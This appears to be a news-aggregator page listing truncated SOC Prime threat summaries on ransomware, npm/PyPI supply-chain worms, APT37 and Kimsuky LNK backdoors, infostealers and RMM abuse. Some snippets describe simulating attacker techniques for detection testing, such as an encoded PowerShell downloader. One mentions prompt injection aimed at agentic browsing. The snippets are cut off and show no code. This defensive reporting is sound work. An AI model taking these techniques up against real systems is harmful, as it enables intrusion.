News
Payload Ransomware Uses Cha Cha20 and Aggressive Anti-Forensics
4+ hour, 11+ min ago (106+ words) SOC Prime Bias: High Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected…...
Shai-Hulud Worm Hits NPM and Py PI Supply Chains
1+ week, 5+ day ago (132+ words) SOC Prime Bias: Critical Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected…...
APT37 Uses LNK Phishing to Deliver Python Backdoor
1+ week, 5+ day ago (281+ words) SOC Prime Bias: Critical The report outlines a multi-stage intrusion campaign linked to the North Korean APT37 group. Initial access begins with spear-phishing emails that carry ZIP archives containing malicious LNK shortcut files. When opened, the LNK launches an obfuscated batch…...
Fake Open Claw Installer Delivers Rust Infostealer
2+ week, 1+ day ago (90+ words) SOC Prime Bias: Medium Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative directly reflect the TTPs identified and aim to generate the exact telemetry expected by…...
Malicious Open Claw Skill Delivers Remcos and Ghost Loader
2+ week, 5+ day ago (115+ words) SOC Prime Bias: Critical Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected…...
Kimsuky LNK Campaign Drops Python Backdoor via Dropbox C2
1+ mon, 2+ week ago (120+ words) SOC Prime Bias: Critical The Kimsuky threat actor drops two malicious files to the victim host: The attacker invokes these scripts directly using the native Windows script hosts to stay "living'off'the'land: Both executions generate a Process Creation event with the…...
5 Browser and AI Security Risks Keeping Cx Os Awake
1+ mon, 2+ week ago (220+ words) SOC Prime Bias: High The report references behaviors such as chunked payload delivery that is reassembled in memory, credential-stealing extensions, AI-assisted spear-phishing, and prompt-injection attempts aimed at agentic browsing workflows. It also cites data points indicating a meaningful share of…...
Lite LLM Supply Chain Attack: Py PI Versions 1. 82. 71. 82. 8
1+ mon, 2+ week ago (106+ words) SOC Prime Bias: Critical Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected…...
XWorm Stealer via BAT Loader and Telegram Exfiltration
3+ mon, 2+ week ago (80+ words) SOC Prime Bias: Medium Encode the malicious payload (a simple downloader that runs the received script): Execute the encoded command: This single line generates the exact telemetry the Sigma rule expects: a Power Shell process, the -Encoded Command flag, and…...
Voicemail Lure Drops Remotely RMM via BAT Script
3+ mon, 2+ week ago (222+ words) SOC Prime Bias: Medium Threat actors are hosting German-language "voicemail" landing pages that entice users to download a BAT file. The script plays a benign audio decoy while quietly installing the legitimate Remotely remote monitoring tool. Once deployed, the RMM…...